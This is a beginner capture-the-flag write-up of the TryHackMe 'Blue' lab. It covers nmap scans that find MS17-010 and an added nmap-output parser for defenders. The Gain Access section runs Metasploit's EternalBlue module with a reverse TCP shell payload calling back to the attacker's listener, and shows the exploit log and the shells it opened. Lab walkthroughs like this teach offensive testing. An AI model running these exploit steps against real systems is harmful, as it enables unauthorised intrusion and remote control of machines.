TryHackMe - Learn - Offensive Pentesting - Blue
Task 1: Recon
Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.
- Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
export IP="10.10.14.17"
mkdir nmap
sudo nmap -sC -sV -v -O $IP -o nmap/initial
# Nmap 7.92 scan initiated Sat Apr 9 02:01:41 2022 as: nmap -sC -sV -v -O -o nmap/initial 10.10.14.17
Nmap scan report for 10.10.14.17
Host is up (0.039s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-04-07T23:52:22
| Not valid after: 2022-10-07T23:52:22
| MD5: 9796 2e4d cd63 7fe6 b315 ab65 f94c 0baf
|_SHA-1: 4ff6 8427 ce68 f8d3 2e98 a71f f0e9 cd4c 9658 1e1a
|_ssl-date: 2022-04-09T00:03:10+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2022-04-09T00:02:55+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/9%OT=135%CT=1%CU=41609%PV=Y%DS=2%DC=I%G=Y%TM=6250CD3
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=106%GCD=1%ISR=10B%TI=I%CI=I%TS=7)OPS(O1=M505NW8ST11%O2=M505NW8S
OS:T11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M505NW8ST11%O6=M505ST11)WIN(W1=200
OS:0%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M50
OS:5NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=
OS:)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.009 days (since Sat Apr 9 01:50:42 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m01s, deviation: 2h14m10s, median: 0s
| smb2-time:
| date: 2022-04-09T00:02:55
|_ start_date: 2022-04-08T23:52:20
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:5e:37:02:b6:59 (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-04-08T19:02:55-05:00
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 9 02:03:09 2022 -- 1 IP address (1 host up) scanned in 88.10 seconds
- How many ports are open with a port number under 1000?
There are 3 ports open with a port number under 1000:
135, 139 and 445
- What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
sudo nmap -v --script=vuln -o nmap/vuln $IP
# Nmap 7.92 scan initiated Sat Apr 9 02:09:41 2022 as: nmap -v --script=vuln -o nmap/vuln 10.10.14.17
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.14.17
Host is up (0.034s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Apr 9 02:11:43 2022 -- 1 IP address (1 host up) scanned in 121.52 seconds
The machine seems to be vulnerable to ms17-010 (CVE-2017-0143), also known as EternalBlue.
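To make the two recon answers above reproducible (which open ports sit below 1000, and what the vuln scripts actually reported) rather than something read off the screen, here is an added example that is not part of the original write-up: a small parser for nmap's normal output format. The sample inputs are constructed excerpts of the two scans shown above; the function names (`open_ports`, `vuln_script_states`, `smb_signing_findings`, `summarize`) and the regular expressions are my own, not nmap's.

```python
import re

# Constructed excerpt of the first scan above (nmap -sC -sV -O, normal output).
NMAP_INITIAL = """\
Nmap scan report for 10.10.14.17
Host is up (0.039s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# Constructed excerpt of the second scan above (nmap --script=vuln).
NMAP_VULN = """\
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# One port-table row, e.g. "445/tcp   open  microsoft-ds ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)", re.M)
# Start of an smb-vuln-* / samba-vuln-* script block; group 2 is non-empty for
# one-line results such as "|_smb-vuln-ms10-054: false".
SCRIPT_HEAD = re.compile(r"^\|_?\s*((?:smb|samba)-vuln-[\w-]+):\s*(.*)$")
# "State: VULNERABLE" line inside a multi-line script block.
STATE_RE = re.compile(r"^\|_?\s*State:\s*(.+?)\s*$")


def open_ports(report):
    """Return [(port, proto, service)] for every open port in the report."""
    return [(int(port), proto, svc)
            for port, proto, state, svc in PORT_RE.findall(report)
            if state == "open"]


def vuln_script_states(report):
    """Map each vuln script name to its result ("VULNERABLE", "false", an NT status, ...)."""
    states, current = {}, None
    for line in report.splitlines():
        head = SCRIPT_HEAD.match(line)
        if head:
            name, inline = head.groups()
            if inline:            # one-line result, no State: line follows
                states[name] = inline
                current = None
            else:                 # multi-line block; wait for its State: line
                current = name
            continue
        state = STATE_RE.match(line)
        if state and current:
            states[current] = state.group(1)
            current = None
    return states


def smb_signing_findings(report):
    """Weak SMB signing settings as reported by the smb-security-mode scripts."""
    findings = []
    if re.search(r"message_signing:\s*disabled", report):
        findings.append("SMBv1 message signing disabled")
    if "Message signing enabled but not required" in report:
        findings.append("SMBv2 message signing not required")
    return findings


def summarize(initial_report, vuln_report, low_port_limit=1000):
    """Combine both scans into the findings a defender would triage."""
    ports = open_ports(initial_report)
    return {
        "open_ports": [p for p, _, _ in ports],
        "low_ports": [p for p, _, _ in ports if p < low_port_limit],
        "smb_exposed": any(p == 445 for p, _, _ in ports),
        "ms17_010": vuln_script_states(vuln_report).get("smb-vuln-ms17-010"),
        "signing": smb_signing_findings(initial_report),
    }


if __name__ == "__main__":
    for key, value in summarize(NMAP_INITIAL, NMAP_VULN).items():
        print(f"{key}: {value}")
```

Besides confirming the three low ports and the ms17-010 state, the summary surfaces the two SMB signing weaknesses nmap reported (SMBv1 signing disabled, SMBv2 signing not required), which are the settings a defender would tighten alongside patching MS17-010 and disabling SMBv1.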
Task 2: Gain Access
- Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
msf6 > search ms17-010 -t exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
We found an exploit for ms17-010. The module exploit/windows/smb/ms17_010_eternalblue should do the trick.
- Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT          445            yes       The target port (TCP)
SMBDomain                     no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass                       no        (Optional) The password for the specified username
SMBUser                       no        (Optional) The username to authenticate as
VERIFY_ARCH    true           yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET  true           yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.178.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
The required value we need to set is the IP address of our target machine (our victim). In our case it is 10.10.14.17.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.14.17
RHOSTS => 10.10.14.17
So the name of the required value is RHOSTS.
- Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
OK, let's use this reverse TCP payload to get a shell connection back from the victim.
One important step that THM does not mention is that I need to set my listener IP address (LHOST) to the IP of my tun0 adapter: because I am connected to the VPN, the reverse connection will not work if I listen on my normal Wi-Fi adapter.
So let's fix that!
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
With that set I will try to run the exploit now!
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.33.96:4444
[*] 10.10.14.17:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.14.17:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.14.17:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.14.17:445 - The target is vulnerable.
[*] 10.10.14.17:445 - Connecting to target for exploitation.
[+] 10.10.14.17:445 - Connection established for exploitation.
[+] 10.10.14.17:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.14.17:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.14.17:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.14.17:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.14.17:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.14.17:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.14.17:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.14.17:445 - Sending all but last fragment of exploit packet
[*] 10.10.14.17:445 - Starting non-paged pool grooming
[+] 10.10.14.17:445 - Sending SMBv2 buffers
[+] 10.10.14.17:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.14.17:445 - Sending final SMBv2 buffers.
[*] 10.10.14.17:445 - Sending last fragment of exploit packet!
[*] 10.10.14.17:445 - Receiving response from exploit packet
[+] 10.10.14.17:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.14.17:445 - Sending egg to corrupted connection.
[*] 10.10.14.17:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Command shell session 2 opened (10.8.33.96:4444 -> 10.10.14.17:49173 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 4 opened (10.8.33.96:4444 -> 10.10.14.17:49175 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 1 opened (10.8.33.96:4444 -> 10.10.14.17:49172 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 3 opened (10.8.33.96:4444 -> 10.10.14.17:49174 ) at 2022-04-09 02:35:37 +0200
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Command shell session 5 opened (10.8.33.96:4444 -> 10.10.14.17:49176 ) at 2022-04-09 02:35:37 +0200
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
